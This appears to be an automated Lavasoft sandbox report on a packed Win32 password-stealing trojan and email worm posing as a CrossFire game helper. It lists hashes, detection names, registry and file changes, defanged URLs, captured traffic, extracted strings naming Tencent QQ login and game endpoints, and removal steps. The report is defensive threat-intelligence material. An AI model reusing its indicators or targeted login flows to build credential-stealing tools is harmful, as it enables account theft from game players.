Gen.Variant.Strictor.112670_68a2c81c8b
Gen:Variant.Strictor.112670 (BitDefender), Trojan:Win32/Tonmye (Microsoft), Trojan.Win32.Generic!BT (VIPRE), Gen:Variant.Strictor.112670 (B) (Emsisoft), Artemis!68A2C81C8B06 (McAfee), ML.Attribute.HighConfidence (Symantec), Gen:Variant.Strictor.112670 (FSecure), Generic_r.JKY (AVG), Win32:Ramnit-DJ (Avast), Gen:Variant.Strictor.112670 (AdAware), Trojan-PSW.Win32.MSNPassword.FD, Trojan.Win32.FlyStudio.FD, GenericEmailWorm.YR, TrojanFlyStudio.YR (Lavasoft MAS)
Behaviour: Trojan-PSW, Trojan, Worm, EmailWorm
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
MD5: 68a2c81c8b062f292e8291458a7a274b
SHA1: fcd21cb0ecc45a6c3624c519f20d8265139ff680
SHA256: 2c0407ad77e5ab2aa685aed10d0c3697f4f4b0c98f975274ad5dec3484fed2ca
SSDeep: 49152:sxZuPheQvDLtVSOppdIVMLWpCHcDzmm7q0FCKgMd6xTnce/:UgPIQXtVSOppdGpCHYzmyfCTMwxTnce
Size: 2171392 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2016-05-18 05:09:22
Analyzed on: Windows7 SP1 32-bit
Summary:
Trojan-PSW. Trojan program intended for stealing users' passwords.
Payload
| Behaviour | Description |
|---|---|
| EmailWorm | Worm can send e-mails. |
Process activity
The Trojan creates the following process(es):
No processes have been created.
The Trojan injects its code into the following process(es):
%original file name%.exe:2712
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process %original file name%.exe:2712 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\4OBULSVD.txt (128 bytes)
C:\exdui.dll (110 bytes)
Registry activity
The process %original file name%.exe:2712 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Tracing\68a2c81c8b062f292e8291458a7a274b_RASMANCS]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\68a2c81c8b062f292e8291458a7a274b_RASAPI32]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\68a2c81c8b062f292e8291458a7a274b_RASMANCS]
"FileTracingMask" = "4294901760"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\68a2c81c8b062f292e8291458a7a274b_RASAPI32]
"FileDirectory" = "%windir%\tracing"
"FileTracingMask" = "4294901760"
"ConsoleTracingMask" = "4294901760"
"EnableConsoleTracing" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\68a2c81c8b062f292e8291458a7a274b_RASMANCS]
"FileDirectory" = "%windir%\tracing"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3C 00 00 00 09 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Tracing\68a2c81c8b062f292e8291458a7a274b_RASMANCS]
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\68a2c81c8b062f292e8291458a7a274b_RASAPI32]
"EnableFileTracing" = "0"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"
Dropped PE files
| MD5 | File path |
|---|---|
| c472335b008c5942ec8a162177058111 | c:\exdui.dll |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
VersionInfo
Company Name: Leesin
Product Name: CF????
Product Version: 2.4.9.0
Legal Copyright: http://www.cfzhushou.com
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 2.4.9.0
File Description: CF????
Comments: CF????
Language: English (United States)
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| UPX0 | 4096 | 2523136 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
| UPX1 | 2527232 | 2068480 | 2064896 | 5.46784 | c31dde20dd6bad235c1c020c7f533ede |
| .rsrc | 4595712 | 49152 | 47616 | 3.74594 | 4f6599fa4e8689ba4e5accb27700e998 |
| .rmnet | 4644864 | 61440 | 57856 | 0.408493 | 0fc2142db650f17e00240151f2b6429e |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
URLs
| URL | IP |
|---|---|
| hxxp://note.youdao.com/yws/public/note/47e1d0e04e8a224cbc6eedb4d182fd1a?keyfrom=public | |
| hxxp://count.knowsky.com/count2/count.asp?id=85436&sx=1&ys=43 | |
| hxxp://leesin1.zichaob.com/cf.txt | |
| time.windows.com | |
| dns.msftncsi.com | |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
ET POLICY Unsupported/Fake Windows NT Version 5.0
Traffic
GET /count2/count.asp?id=85436&sx=1&ys=43 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: count.knowsky.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 26 May 2017 20:10:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 687
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCCBBASSB=HEIEIKDAHFEKJKENNPDDJFIH; path=/
Cache-control: private

document.write('<a href=hXXp://count.knowsky.com target=_blank title=..........8241 ..........29774830 ..............><img border=0 src=hXXp://count.knowsky.com/img/43/2.gif><img border=0 src=hXXp://count.knowsky.com/img/43/9.gif><img border=0 src=hXXp://count.knowsky.com/img/43/7.gif><img border=0 src=hXXp://count.knowsky.com/img/43/7.gif><img border=0 src=hXXp://count.knowsky.com/img/43/4.gif><img border=0 src=hXXp://count.knowsky.com/img/43/8.gif><img border=0 src=hXXp://count.knowsky.com/img/43/3.gif><img border=0 src=hXXp://count.knowsky.com/img/43/0.gif></a><iframe frameBorder=no scrolling=no name=abc width=0 height=0 src=hXXp://count.knowsky.com/js.asp></iframe>')
GET /yws/public/note/47e1d0e04e8a224cbc6eedb4d182fd1a?keyfrom=public HTTP/1.1
Accept: */*
Referer: hXXp://note.youdao.com/yws/public/note/47e1d0e04e8a224cbc6eedb4d182fd1a?keyfrom=public
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: note.youdao.com
Cache-Control: no-cache
HTTP/1.1 500 Internal Server Error
Server: Tengine
Date: Fri, 26 May 2017 20:08:24 GMT
Content-Type: text/json; charset=UTF-8
Content-Length: 244
Connection: keep-alive
RES-CODE: 1007
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Language: zh-CN
Set-Cookie: OUTFOX_SEARCH_USER_ID=-2031401031@10.120.182.17; expires=Sun, 19-May-2047 20:08:24 GMT

{"canTryAgain":false,"scope":"PREVIOUS_EXCEPTION","error":"1007","message":"Message[SHARE_BANNED_EXCEPTION]: Public shared file is banned, userId=qq6DF15761F9622C1DB6F9E3D3D8BAAF16, fileId=WEBedc0845ba5c5978c6e44ce0591a39d34","objectUser":null}
The Trojan connects to the servers at the following location(s):
gameId=&sArea=&iSex=&sRoleId=&iGender=&sServiceType=tgclub&objCustomMsg=&areaname=&roleid=&rolelevel=&rolename=&areaid=&iActivityId=38135&iFlowId=
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=tgclub&iActivityId=38135&sServiceDepartment=xinyue&set_info=xinyue
gameId=&sArea=&iSex=&sRoleId=&iGender=&sServiceType=tgclub&objCustomMsg=&areaname=&roleid=&rolelevel=&rolename=&areaid=&iActivityId=38135&iFlowId=214216&g_tk=
|322|
sCdKey=
hXXp://cf.ams.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=8918&sServiceDepartment=x1m1
sMsg" : "
\gzip.dll
.text
`.data
@.reloc
KERNEL32.dll
gzip.pdb
_u%SV
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E)
hXXp://apps.game.qq.com/cgi-bin/cf/a20090409forceout/getinfo.cgi
hXXp://webd.tgp.qq.com/cf/info_proxy/weapon_stat_info?&&zone_id=
1970.01.01 00:00:00
hXXps://ssl.ptlogin2.qq.com/ptqrshow?appid=21000124&e=2&l=M&s=4&d=72&v=4&t=0.061519597441372864&daid=8
&js_ver=10151&js_type=1&login_sig=7qKho-IT4nBHQJBVoTYw6p-IGP0hieZLRsmCy5MWU7g0bRJNRkb5q8yH7BUA7cTM&pt_uistyle=20&aid=21000124&daid=8&
hXXps://ssl.ptlogin2.qq.com/ptqrlogin?ptredirect=1&u1=http://cf.qq.com/cp/a20160223czxlx/index.htm?e_code=213709&h=1&t=1&g=1&from_ui=1&ptlang=2052&action=6-0-
hXXp://cf.qq.com/cfvip/
hXXp://xinyue.qq.com
Report
themepassword
SysShadow.HostWnd
{6AEDBD6D-3FB5-418A-83A6-7F45229DC872}VBScript.RegExp
{0002DF05-0000-0000-C000-000000000046}{D30C1661-CDAF-11D0-8A3E-00C04FC9E26E}{6D5140C1-7436-11CE-8034-00AA006009FA}{D30C1661-CDAF-11d0-8A3E-00C04FC9E26E}document.all.resultjs.innerText=
var jie = document.createStyleSheet();jie.addRule('html','overflow:hidden;');SysShadow.Menu
Microsoft.XMLDOM
14:00~16:00
12:00-19:00
123456789
00003333
deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
inflate 1.1.3 Copyright 1995-1998 Mark Adler
F%*.*f
CNotSupportedException
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
COMCTL32.DLL
CCmdTarget
MSH_SCROLL_LINES_MSG
MSWHEEL_ROLLMSG
__MSVCRT_HEAP_SELECT
Broken pipe
Inappropriate I/O control operation
Operation not permitted
iphlpapi.dll
MPR.dll
VERSION.dll
WSOCK32.dll
.PAVCException@@
Shell32.dll
Mpr.dll
Advapi32.dll
(&07-034/)7 '
?? / %d]
%d / %d]
.PAVCFileException@@
: %d]
(*.*)|*.*||
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|PNG
(*.PNG)|*.PNG|BMP
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
%s:%d
windows
.PAVCNotSupportedException@@
out.prn
(*.prn)|*.prn|
%d.%d
%d/%d
1.6.9
unsupported zlib version
png_read_image: unsupported transformation
%d / %d
Bogus message code %d
libpng error: %s
libpng warning: %s
1.1.3
bad keyword
libpng does not support gamma background rgb_to_gray
Palette is NULL in indexed image
(%d-%d):
%ld%c
msscript.ocx
VVV.dywt.com.cn
\\.\Smartvsd
\\.\PhysicalDrive%d
\\.\Scsi%d:
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP/1.0
%s <%s>
Reply-To: %s
From: %s
To: %s
Subject: %s
Date: %s
Cc: %s
%a, %d %b %Y %H:%M:%S
SMTP
;3 #>6.&
'2, / 0&7!4-)1#
%d%d%d
rundll32.exe shell32.dll,
.PAVCOleException@@
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCOleDispatchException@@
.PAVCArchiveException@@
right-curly-bracket
left-curly-bracket
0123456789
c:\%original file name%.exe
GetCPInfo
WinExec
RegOpenKeyExA
RegCreateKeyExA
GetViewportExtEx
ScaleViewportExtEx
SetViewportExtEx
OffsetViewportOrgEx
SetViewportOrgEx
GetViewportOrgEx
GetKeyState
GetKeyboardState
CreateDialogIndirectParamA
UnhookWindowsHookEx
SetWindowsHookExA
InternetCanonicalizeUrlA
InternetCrackUrlA
`.rdata
@.data
KeyA
UrlA3
#include "l.chs\afxres.rc" // Standard components
.FNNNNNNNNNNNNNNV
.FNNNNNNNNNNNN
.CNNNB
.CNNd
ÝDDDDDDQC
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity name="E.App" processorArchitecture="x86" version="5.2.0.0" type="win32"/><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"> <security> <requestedPrivileges> <requestedExecutionLevel level="requireAdministrator" uiAccess="false"/> </requestedPrivileges> </security></trustInfo></assembly>PAD
oledlg.dll
RASAPI32.dll
WININET.dll
1.0.15.507
1.0.0.0
6.0.2600.0 (xpclient.010817-1148)
6.0.2600.0
(*.*)
2.4.9.0
hXXp://VVV.cfzhushou.com
%original file name%.exe_2712_rwx_00401000_0045F000:
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|PNG
(*.PNG)|*.PNG|BMP
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
%s:%d
windows
.PAVCNotSupportedException@@
out.prn
(*.prn)|*.prn|
%d.%d
%d/%d
1.6.9
unsupported zlib version
png_read_image: unsupported transformation
%d / %d
Bogus message code %d
libpng error: %s
libpng warning: %s
1.1.3
bad keyword
libpng does not support gamma background rgb_to_gray
Palette is NULL in indexed image
(%d-%d):
%ld%c
msscript.ocx
VVV.dywt.com.cn
\\.\Smartvsd
\\.\PhysicalDrive%d
\\.\Scsi%d:
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP/1.0
%s <%s>
Reply-To: %s
From: %s
To: %s
Subject: %s
Date: %s
Cc: %s
%a, %d %b %Y %H:%M:%S
SMTP
;3 #>6.&
'2, / 0&7!4-)1#
%d%d%d
rundll32.exe shell32.dll,
.PAVCOleException@@
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCOleDispatchException@@
.PAVCArchiveException@@
right-curly-bracket
left-curly-bracket
0123456789
c:\%original file name%.exe
GetCPInfo
WinExec
RegOpenKeyExA
RegCreateKeyExA
GetViewportExtEx
ScaleViewportExtEx
SetViewportExtEx
OffsetViewportOrgEx
SetViewportOrgEx
GetViewportOrgEx
GetKeyState
GetKeyboardState
CreateDialogIndirectParamA
UnhookWindowsHookEx
SetWindowsHookExA
InternetCanonicalizeUrlA
InternetCrackUrlA
`.rdata
@.data
1.0.15.507
1.0.0.0
6.0.2600.0 (xpclient.010817-1148)
6.0.2600.0
%original file name%.exe_2712_rwx_01EF0000_00013000:
svchost.exe_992:
%original file name%.exe_2712_rwx_10001000_00033000:
Remove it with Ad-Aware
- Download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager): No processes have been created.
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\4OBULSVD.txt (128 bytes)
C:\exdui.dll (110 bytes)
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.